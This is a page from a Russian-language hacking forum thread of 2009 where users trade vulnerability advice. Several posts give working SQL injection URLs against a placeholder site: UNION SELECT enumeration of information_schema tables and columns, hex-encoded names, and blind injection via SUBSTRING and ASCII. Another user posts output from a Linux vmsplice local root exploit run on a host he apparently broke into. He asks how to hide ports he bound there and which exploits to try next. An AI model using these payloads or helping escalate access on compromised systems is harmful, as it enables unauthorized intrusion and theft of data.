ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 975 из 1393 « Первая < 475875925965 971 972 973 974 975 976 977 978 979 98510251075 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #9741  
Старый 31.10.2009, 09:31
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
est takoy vapros..(izvinite 4to po ruskom ne napisu)

naprimer na sayte est injection (mysql ili sql) i ya nasel table name

http://www.xxx.com/news.php?iid=1+union+select+0,1,2,3,4+from+admin

a potom ya xo4u nayti columns name nu tut ne daet kakom 4isle columns name naprimer 2,3 a kak mojno ix uznat??

order+by ili kak??
 

  #9742  
Старый 31.10.2009, 09:34
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию
Цитата:
Сообщение от LokbatanLi  
est takoy vapros..(izvinite 4to po ruskom ne napisu)

naprimer na sayte est injection (mysql ili sql) i ya nasel table name

http://www.xxx.com/news.php?iid=1+union+select+0,1,2,3,4+from+admin

a potom ya xo4u nayti columns name nu tut ne daet kakom 4isle columns name naprimer 2,3 a kak mojno ix uznat??

order+by ili kak??
RTFM!
Статей по скулям - тьма!
 

  #9743  
Старый 31.10.2009, 09:38
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
ne ponel
 

  #9744  
Старый 31.10.2009, 10:11
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
LokbatanLi
http://www.xxx.com/news.php?iid=1+union+select+table_name,1,2,3,4+fro m+information_schema.tables+limit+17,1
только в случае если весия ДБ 5, и если у тебя вывод под цифрой 0
дальше после того как узнал имя нужной табелки
http://www.xxx.com/news.php?iid=1+union+select+column_name,1,2,3,4+fr om+information_schema.columns+where+table_name='ad min'+limit+0,1
имя табелки лучше перевести в SQL HEX
а еще лучше я думаю вот такой вот запрос сделать

http://www.xxx.com/news.php?iid=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYP T(CONCAT(0xd187d0b8d182d0b0d0b920d181d182d0b0d182d 0b5d0b9d0bad0b820d0bfd180d0be20d181d0bad183d0bbd0b 8,(SELECT+CONCAT(TABLE_NAME,0x3a,TABLE_SCHEMA)+FRO M+INFORMATION_SCHEMA.TABLES+LIMIT+16,1),0x 0xd182d0b8d0bfd0be20687474703a2f2f666f72756d2e616e 7469636861742e72752f7468726561643130343539312e6874 6d6c),0x71),0x71)
 

  #9745  
Старый 31.10.2009, 10:56
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию
Цитата:
Сообщение от krypt3r  
p.r0phe.t, что показывают команды
Код:
$ find / -name stdio.h
и/или
Код:
$ locate stdio.h
Возможно, они есть, но лежат по нестандартному пути. Если же не найдутся, придется компилить на другой тачке. А тянуть все хэдеры - это гемор
Все либы есть на хосте. Какой синтаксис для прописывания путей к ним? В си не шарю =(
 

  #9746  
Старый 31.10.2009, 11:15
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию
p.r0phe.t
да кинь ты уже кому нить линк в пм!
 

  #9747  
Старый 31.10.2009, 11:23
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию
Цитата:
Сообщение от Rubaka  
p.r0phe.t
да кинь ты уже кому нить линк в пм!
К шелу линк? хм.
Мне для себя интересно поковыряться.
В общем разобрался,сплойт не проканал =(
sh-3.1$ ./expl
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e22000 .. 0xb7e54000
[-] vmsplice: Bad address

Снова есть вопрос
Как прикрыть забинденные мной порты? =)
И какой ещё сплойт под эту систему посоветуете
Linux yesclub 2.6.18-6-686
Последний раз редактировалось p.r0phe.t; 31.10.2009 в 11:43..
 

  #9748  
Старый 31.10.2009, 12:20
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
Цитата:
Сообщение от Gorev  
LokbatanLi
http://www.xxx.com/news.php?iid=1+union+select+table_name,1,2,3,4+fro m+information_schema.tables+limit+17,1
только в случае если весия ДБ 5, и если у тебя вывод под цифрой 0
дальше после того как узнал имя нужной табелки
http://www.xxx.com/news.php?iid=1+union+select+column_name,1,2,3,4+fr om+information_schema.columns+where+table_name='ad min'+limit+0,1
имя табелки лучше перевести в SQL HEX
а еще лучше я думаю вот такой вот запрос сделать

http://www.xxx.com/news.php?iid=1+UNION+SELECT+AES_DECRYPT(AES_ENCRYP T(CONCAT(0xd187d0b8d182d0b0d0b920d181d182d0b0d182d 0b5d0b9d0bad0b820d0bfd180d0be20d181d0bad183d0bbd0b 8,(SELECT+CONCAT(TABLE_NAME,0x3a,TABLE_SCHEMA)+FRO M+INFORMATION_SCHEMA.TABLES+LIMIT+16,1),0x 0xd182d0b8d0bfd0be20687474703a2f2f666f72756d2e616e 7469636861742e72752f7468726561643130343539312e6874 6d6c),0x71),0x71)
vi ne poneli menya
 

  #9749  
Старый 31.10.2009, 12:29
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию
Цитата:
Сообщение от LokbatanLi  
vi ne poneli menya
Для начала, воспользуйся сервисом http://www.translit.ru , дабы тебя можно было лучше понять. После этого или перефразируй свой вопрос, или же прочти вот эту статью . Мне кажется, после прочтения (возможно, первого) многие вопросы отпадут сами собой. Удачи! =)
 

  #9750  
Старый 31.10.2009, 12:55
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
LokbatanLi
Прочитай то что тебе люди рекомендуют, если бы перевел захексенное в текст в последнем моем запросе для тебя, то о чудо там бы и ссыль на как ракрутить скулю была и еще многие ответы на твои вопросы, а если тебе не подобрать число столбцов в скуле то или ищи в другом месте скулю с выводом , или крути cкулю как слепую (блайнд)
http://www.xxx.com/news.php?iid=1+AND+SUBSTRING((version())=x
где х меняешь в соответствие с запросом...
или
http://www.xxx.com/news.php?iid=1+AND+ASCII(SUBSTRING((version() ),1,1))>char твоего запроса
www.translit.ru обеспечит нормальное отношение к тебе и позволит сформулировать вопрос на который можно будет ответить ...
 
 
Страница 975 из 1393 « Первая < 475875925965 971 972 973 974 975 976 977 978 979 98510251075 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ